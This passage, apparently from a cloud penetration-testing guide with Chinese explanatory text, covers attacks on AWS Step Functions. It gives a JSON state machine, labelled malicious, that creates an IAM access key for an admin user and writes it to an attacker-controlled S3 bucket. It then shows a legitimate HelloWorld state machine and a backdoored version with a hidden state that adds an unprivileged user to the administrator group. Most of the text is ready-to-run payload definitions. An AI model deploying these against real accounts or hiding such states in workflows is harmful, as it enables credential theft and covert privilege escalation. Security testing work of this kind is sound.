{"Comment":"Malicious state machine to create IAM access key and upload to S3","StartAt":"CreateAccessKey","States": {"CreateAccessKey": {"Type":"Task","Resource":"arn:aws:states:::aws-sdk:iam:createAccessKey","Parameters": {"UserName":"admin"},"ResultPath":"$.AccessKeyResult","Next":"PrepareS3PutObject"},"PrepareS3PutObject": {"Type":"Pass","Parameters": {"Body.$":"$.AccessKeyResult.AccessKey","Bucket":"attacker-controlled-S3-bucket","Key":"AccessKey.json"},"ResultPath":"$.S3PutObjectParams","Next":"PutObject"},"PutObject": {"Type":"Task","Resource":"arn:aws:states:::aws-sdk:s3:putObject","Parameters": {"Body.$":"$.S3PutObjectParams.Body","Bucket.$":"$.S3PutObjectParams.Bucket","Key.$":"$.S3PutObjectParams.Key"},"End":true}}}
以下示例展示了如何更新一个合法的状态机,该状态机仅调用一个 HelloWorld Lambda 函数,以添加一个额外的状态,将用户 unprivilegedUser 添加到 administrator IAM 组。这样,当一个合法用户启动更新后的状态机的执行时,这个新的恶意隐蔽状态将被执行,特权提升将成功。
如果状态机没有关联一个宽松的 IAM 角色,还需要 iam:PassRole 权限来更新 IAM 角色,以便关联一个宽松的 IAM 角色(例如,附加了 arn:aws:iam::aws:policy/AdministratorAccess 策略的角色)。
{"Comment":"Hello world from Lambda state machine","StartAt":"Start PassState","States": {"Start PassState": {"Type":"Pass","Next":"LambdaInvoke"},"LambdaInvoke": {"Type":"Task","Resource":"arn:aws:states:::lambda:invoke","Parameters": {"FunctionName":"arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"},"Next":"End PassState"},"End PassState": {"Type":"Pass","End":true}}}
{"Comment":"Hello world from Lambda state machine","StartAt":"Start PassState","States": {"Start PassState": {"Type":"Pass","Next":"LambdaInvoke"},"LambdaInvoke": {"Type":"Task","Resource":"arn:aws:states:::lambda:invoke","Parameters": {"FunctionName":"arn:aws:lambda:us-east-1:123456789012:function:HelloWorldLambda:$LATEST"},"Next":"AddUserToGroup"},"AddUserToGroup": {"Type":"Task","Parameters": {"GroupName":"administrator","UserName":"unprivilegedUser"},"Resource":"arn:aws:states:::aws-sdk:iam:addUserToGroup","Next":"End PassState"},"End PassState": {"Type":"Pass","End":true}}}
